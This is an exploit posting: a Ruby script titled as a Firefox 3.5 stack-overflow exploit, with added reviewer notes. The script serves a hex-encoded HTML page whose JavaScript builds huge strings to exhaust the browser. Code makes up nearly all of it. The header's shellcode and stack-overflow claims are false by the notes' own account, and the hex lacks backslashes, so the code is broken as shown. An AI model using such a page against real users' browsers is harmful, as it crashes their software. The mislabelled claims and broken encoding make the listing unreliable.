Firefox 3.5 Stack Overflow Exploit
Posted on 31 March 2010
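#!/usr/bin/env ruby
# ==================================
# Firefox 3.5 Stack Overflow Exploit
# ==================================
#########################################################
# Exploit       : Shellcode Stack Overflow Firefox 3.5
# Date          : 23/03/2010
# Author        : Whivack Gsk?
# Software Link : http://www.mozilla-europe.org/fr/firefox/3.5/releasenotes/
# Version       : 3.5
# Tested On     : XP/Vista & Ubuntu
# Usage         : Connect Firefox Browser http://127.0.0.1:81/
##########################################################
#
# Reviewer notes
# --------------
# * Purpose: a one-file HTTP responder that answers every connection with the
#   same fixed body, so a browser under test can be pointed at it.
# * The body is not shellcode. Its hex values are ASCII for an HTML document
#   with one inline script: the script grows two strings by repeated doubling
#   (49,000,000 and 21,000,000 repetitions of a short seed) and passes both to
#   document.write. No machine code is present anywhere in the listing.
# * The listing therefore demonstrates resource exhaustion in the browser; the
#   "stack overflow" label is the author's, and nothing on the page shows
#   control of execution. Treat it as a crash / denial-of-service test case
#   unless a debugger trace says otherwise.
# * As extracted, each "x3C"-style pair below is literal text (no backslash in
#   front of the x), so the responder sends those characters verbatim.
# * Affected software per the header is Firefox 3.5 only, a release line that
#   has been out of support for years; the remedy is a maintained browser.
require 'socket'

# Fixed response body (named "shellcode" in the original listing). Reproduced
# byte-for-byte from the page; see the reviewer notes for what it encodes.
response_body =
  "x3Cx68x74x6Dx6Cx3E" +
  "x3Cx68x65x61x64x3E" +
  "x3Cx73x63x72x69x70x74x3E" +
  "x76x61x72x20x73x20x3Dx20x75x6Ex65x73x63x61x70x65x28x22x25x75x34x31x34x31x25x75x34x31x34x31x22x29x3Bx20" +
  "x76x61x72x20x73x74x20x3Dx20x75x6Ex65x73x63x61x70x65x28x22x25x75x30x30x30x30x25x75x30x30x30x30x22x29x3Bx20" +
  "x76x61x72x20x66x32x20x3Dx20x6Dx75x6Cx38x28x73x74x2Cx20x34x39x30x30x30x30x30x30x29x3Bx20" +
  "x76x61x72x20x66x20x3Dx20x6Dx75x6Cx38x28x73x2Cx20x32x31x30x30x30x30x30x30x29x3Bx20" +
  "x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x66x32x29x3Bx20" +
  "x64x6Fx63x75x6Dx65x6Ex74x2Ex77x72x69x74x65x28x66x29x3Bx20" +
  "x66x75x6Ex63x74x69x6Fx6Ex20x6Dx75x6Cx38x28x73x2Cx20x6Ex75x6Dx29x20x7Bx20" +
  "x76x61x72x20x69x20x3Dx20x4Dx61x74x68x2Ex63x65x69x6Cx28x4Dx61x74x68x2Ex6Cx6Fx67x28x6Ex75x6Dx29x20x2Fx20x4Dx61x74x68x2Ex4Cx4Ex32x29x2Cx20" +
  "x72x65x73x20x3Dx20x73x3B" +
  "x64x6Fx20x7B" +
  "x72x65x73x20x2Bx3Dx72x65x73x3B" +
  "x7Dx20x77x68x69x6Cx65x20x28x30x20x3Cx20x2Dx2Dx69x29x3B" +
  "x72x65x74x75x72x6Ex20x72x65x73x2Ex73x6Cx69x63x65x28x30x2Cx20x73x2Ex6Cx65x6Ex67x74x68x20x2Ax6Ex75x6Dx29x3B" +
  "x7D" +
  "x3Cx2Fx73x63x72x69x70x74x3E" +
  "x3Cx2Fx68x65x61x64x3E" +
  "x3Cx62x6Fx64x79x3E" +
  "x3Cx2Fx62x6Fx64x79x3E" +
  "x3Cx2Fx68x74x6Dx6Cx3E" +
  "x3Cx68x74x6Dx6Cx3E" +
  "x3Cx62x6Fx64x79x3E" +
  "x3Cx2Fx62x6Fx64x79x3E" +
  "x3Cx2Fx68x74x6Dx6Cx3E"

# Listen on the loopback address only. The header documents the test URL as
# http://127.0.0.1:81/, and TCPServer.new(81) alone would accept connections
# on every interface of the machine. Port 81 is below 1024, which is a
# privileged range on most Unix-like systems.
server = TCPServer.new('127.0.0.1', 81)

loop do
  client = server.accept
  begin
    # Read and discard the request line; every request gets the same answer.
    client.gets
    client.puts("HTTP/1.0 200 OK")
    client.puts("Content-Type:text/html")
    client.puts # blank line ends the header section
    client.puts response_body
  ensure
    # Release the socket even if the peer disconnects mid-response.
    client.close
  end
end
# Inj3ct0r.com [2010-03-31]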